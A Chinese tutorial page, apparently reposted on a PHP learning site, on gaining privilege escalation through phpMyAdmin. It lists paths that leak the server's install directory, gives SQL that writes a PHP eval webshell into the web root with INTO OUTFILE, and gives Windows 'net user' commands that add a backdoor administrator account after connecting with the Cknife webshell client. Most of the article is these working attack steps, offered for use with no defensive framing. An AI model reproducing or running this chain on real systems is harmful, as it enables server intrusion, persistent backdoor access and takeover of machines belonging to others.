首页 >数据库 >phpMyAdmin > 正文

怎么利用phpMyAdmin提权

转载2021-02-03 18:48:510821
下面由phpmyadmin教程栏目给大家介绍利用phpMyAdmin提权的方法,希望对需要的朋友有所帮助!

利用phpMyAdmin提权

爆路径

  • /phpmyadmin/libraries/lect_lang.lib.php
  • /phpMyAdmin/index.php?lang[]=1
  • /phpMyAdmin/phpinfo.php
  • /load_file()
  • /phpmyadmin/themes/darkblue_orange/layout.inc.php
  • /phpmyadmin/libraries/select_lang.lib.php
  • /phpmyadmin/libraries/lect_lang.lib.php
  • /phpmyadmin/libraries/mcrypt.lib.php

得到物理路径 C:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.php

写马

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES("<?php eval($_POST[Cknife]);?>");
select cmd from a into outfile "C:/wamp/www/phpmyadmin/d.php";
Drop TABLE IF EXISTS a;

获得webshell

最后用Cknife连接,创建帐户并添加到管理员用户组
net user admin admin /add
net localgroup administrator admin /add

以上就是怎么利用phpMyAdmin提权的详细内容,更多请关注php中文网其它相关文章!

php中文网最新课程二维码

声明:本文转载于:cnblogs,如有侵犯,请联系admin@php.cn删除

  • 相关标签:phpMyAdmin

  • 相关文章

    相关视频

    网友评论

    文明上网理性发言,请遵守 新闻评论服务协议

    我要评论

    • 专题推荐

    作者信息
    发布技术文章
    • 最新文章
    • 热门排行
    推荐视频教程
  • Mac PHP开发工具与环境搭建Mac PHP开发工具与环境搭建
  • 《基于Swoole偷看MySQL与PHP的通信过程》《基于Swoole偷看MySQL与PHP的通信过程》
  • ThinkPHP5.1开发基础ThinkPHP5.1开发基础
  • ThinkPHP5.1企业站点快速开发ThinkPHP5.1企业站点快速开发
  • PHP安全与漏洞PHP安全与漏洞
    • 视频教程分类

    php中文网:公益在线php培训,帮助PHP学习者快速成长!

    Copyright 2014-2021 //m.sbmmt.com/ All Rights Reserved | 苏ICP备2020058653号-1关于我们免责申明赞助与捐赠广告合作